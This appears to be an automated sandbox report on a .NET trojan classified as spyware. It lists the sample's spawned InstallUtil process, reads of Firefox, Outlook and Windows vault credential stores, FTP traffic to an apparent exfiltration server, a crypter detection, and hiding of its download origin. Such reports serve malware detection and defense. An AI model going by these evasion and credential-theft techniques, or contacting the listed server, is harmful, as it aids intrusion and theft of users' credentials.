Source: Joe Sandbox View	IP Address: 162.241.203.30 162.241.203.30
Source: Joe Sandbox View	IP Address: 162.241.203.30 162.241.203.30

Source: Joe Sandbox View

ASN Name: OIS1US OIS1US

Source: unknown

FTP traffic detected: 162.241.203.30:21 -> 192.168.2.5:49823 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed.220-Local time is now 13:19. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed.220-Local time is now 13:19. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed.220-Local time is now 13:19. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: ftp.aminhacorretora.com.br

Source: InstallUtil.exe, 00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aminhacorretora.com.br
Source: InstallUtil.exe, 00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.aminhacorretora.com.br
Source: umVoLahqZn.exe, 00000000.00000002.2727525135.0000000006761000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.c0/
Source: InstallUtil.exe, 00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Source: C:\Users\user\Desktop\umVoLahqZn.exe

Code function: 0_2_07E2BC58 CreateProcessAsUserW,

0_2_07E2BC58

Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_013F0B10	0_2_013F0B10
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_013F1470	0_2_013F1470
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_01538370	0_2_01538370
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_0153118E	0_2_0153118E
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_01531980	0_2_01531980
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_01537D48	0_2_01537D48
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_06524C78	0_2_06524C78
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_06524C68	0_2_06524C68
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_0652EBF0	0_2_0652EBF0
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07C306E0	0_2_07C306E0
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07C34A58	0_2_07C34A58
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07C54560	0_2_07C54560
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07C50040	0_2_07C50040
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07C50013	0_2_07C50013
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07CBEFF8	0_2_07CBEFF8
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07CBD780	0_2_07CBD780
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07CBCF08	0_2_07CBCF08
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07CBAE52	0_2_07CBAE52
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07CB8DB8	0_2_07CB8DB8
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07CBE148	0_2_07CBE148
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07CB401E	0_2_07CB401E
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07CB2F80	0_2_07CB2F80
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07CBCEF8	0_2_07CBCEF8
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E24B50	0_2_07E24B50
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E26E78	0_2_07E26E78
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E26620	0_2_07E26620
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E2C1D8	0_2_07E2C1D8
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E21820	0_2_07E21820
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E213F0	0_2_07E213F0
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E223CE	0_2_07E223CE
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E223D0	0_2_07E223D0
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E28BA8	0_2_07E28BA8
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E28BB8	0_2_07E28BB8
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E25B68	0_2_07E25B68
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E24B4A	0_2_07E24B4A
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E25B58	0_2_07E25B58
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E20B20	0_2_07E20B20
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E20B10	0_2_07E20B10
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E21668	0_2_07E21668
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E21678	0_2_07E21678
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E20E10	0_2_07E20E10
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E26619	0_2_07E26619
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E211C8	0_2_07E211C8
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E29DB0	0_2_07E29DB0
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E211B9	0_2_07E211B9
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E2A518	0_2_07E2A518
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E20040	0_2_07E20040
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E21400	0_2_07E21400
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E20013	0_2_07E20013
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07E21810	0_2_07E21810
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07C54535	0_2_07C54535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_019040F0	4_2_019040F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_01904D08	4_2_01904D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_01904438	4_2_01904438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_06AF85F0	4_2_06AF85F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_06AF90C8	4_2_06AF90C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_06AF75A0	4_2_06AF75A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_06AFD3C8	4_2_06AFD3C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_06AF90B7	4_2_06AF90B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_06AF5828	4_2_06AF5828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_06C35E88	4_2_06C35E88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_06C337D0	4_2_06C337D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_06C3E410	4_2_06C3E410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_06C3AAD0	4_2_06C3AAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_06C391A8	4_2_06C391A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_06C38168	4_2_06C38168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_06C388E8	4_2_06C388E8

Source: umVoLahqZn.exe, 00000000.00000002.2724787687.000000000462F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs umVoLahqZn.exe
Source: umVoLahqZn.exe, 00000000.00000002.2724787687.000000000462F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTokenTableApp.dll> vs umVoLahqZn.exe
Source: umVoLahqZn.exe, 00000000.00000002.2724787687.00000000043E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTokenTableApp.dll> vs umVoLahqZn.exe
Source: umVoLahqZn.exe, 00000000.00000002.2712396122.000000000156E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs umVoLahqZn.exe
Source: umVoLahqZn.exe, 00000000.00000002.2713909861.000000000373E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs umVoLahqZn.exe
Source: umVoLahqZn.exe, 00000000.00000002.2724787687.000000000455E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs umVoLahqZn.exe
Source: umVoLahqZn.exe, 00000000.00000002.2728250777.0000000008590000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRP8SH.dll6 vs umVoLahqZn.exe
Source: umVoLahqZn.exe, 00000000.00000000.2045226956.00000000000DE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameu7iuh700.exeT vs umVoLahqZn.exe
Source: umVoLahqZn.exe, 00000000.00000002.2726127716.0000000005A70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTokenTableApp.dll> vs umVoLahqZn.exe
Source: umVoLahqZn.exe	Binary or memory string: OriginalFilenameu7iuh700.exeT vs umVoLahqZn.exe

Source: umVoLahqZn.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: umVoLahqZn.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: umVoLahqZn.exe, Kg2.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/4@1/1

Source: C:\Users\user\Desktop\umVoLahqZn.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\umVoLahqZn.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Mutant created: NULL

Source: umVoLahqZn.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: umVoLahqZn.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\umVoLahqZn.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: umVoLahqZn.exe

ReversingLabs: Detection: 71%

Source: unknown	Process created: C:\Users\user\Desktop\umVoLahqZn.exe "C:\Users\user\Desktop\umVoLahqZn.exe"
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\umVoLahqZn.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntmarta.dll	Jump to behavior

Source: C:\Users\user\Desktop\umVoLahqZn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\umVoLahqZn.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: umVoLahqZn.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: umVoLahqZn.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected DarkTortilla Crypter

Source: Yara match	File source: 0.2.umVoLahqZn.exe.4695470.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.umVoLahqZn.exe.4695470.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.umVoLahqZn.exe.5a70000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.umVoLahqZn.exe.5a70000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.umVoLahqZn.exe.462f142.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2724787687.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2724787687.000000000462F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2726127716.0000000005A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2713909861.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: umVoLahqZn.exe PID: 5812, type: MEMORYSTR

.NET source code contains method to dynamically call methods (often used by packers)

Source: umVoLahqZn.exe, x5.cs

.Net Code: NewLateBinding.LateCall(obj7, (Type)null, "DynamicInvoke", new object[1] { new object[0] }, (string[])null, (Type[])null, (bool[])null, true)

Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_01538A98 push eax; iretd	0_2_01539021
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_0153CAE7 push 4C0336FCh; ret	0_2_0153CAF5
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_065211B5 pushfd ; ret	0_2_065211B7
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07C32D90 push es; ret	0_2_07C32DA0
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07C3D44F push ecx; retf EFCDh	0_2_07C3D5BA
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07C5A1A9 push ecx; retf 0046h	0_2_07C5A1CA
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07C5D07C pushad ; retf	0_2_07C5D0D5
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07C5F21F push eax; iretd	0_2_07C5F22E
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07CBA3ED push ds; retf 0040h	0_2_07CBA43E
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07CB7733 push edi; ret	0_2_07CB792E
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07CB81F1 push es; ret	0_2_07CB8200
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Code function: 0_2_07CB793C push eax; ret	0_2_07CB796D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_06C315C0 push es; ret	4_2_06C315D0

Source: umVoLahqZn.exe

Static PE information: section name: .text entropy: 7.173088295592971

Source: umVoLahqZn.exe, Kg2.cs	High entropy of concatenated method names: 'm4X', 'x8R', 'i4T', 'Zf2', 'k7Q', 'Bp3', 'Da0', 'a6R', 'Ns2', 'Wx2'
Source: umVoLahqZn.exe, d0N.cs	High entropy of concatenated method names: 'Hg6', 'Tq3', 'y3R', 'Tg0', 'n3Q', 'Zc9', 'p1T', 'Cx4', 'Sd9', 'i0C'
Source: umVoLahqZn.exe, j1.cs	High entropy of concatenated method names: 'Tm1', 'Wa8', 'Hm8', 'Fw7', 'Wn1', 'n1B', 'x5X', 'Ge2', 'Kx7', 'e3'

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\umVoLahqZn.exe

File opened: C:\Users\user\Desktop\umVoLahqZn.exe\:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
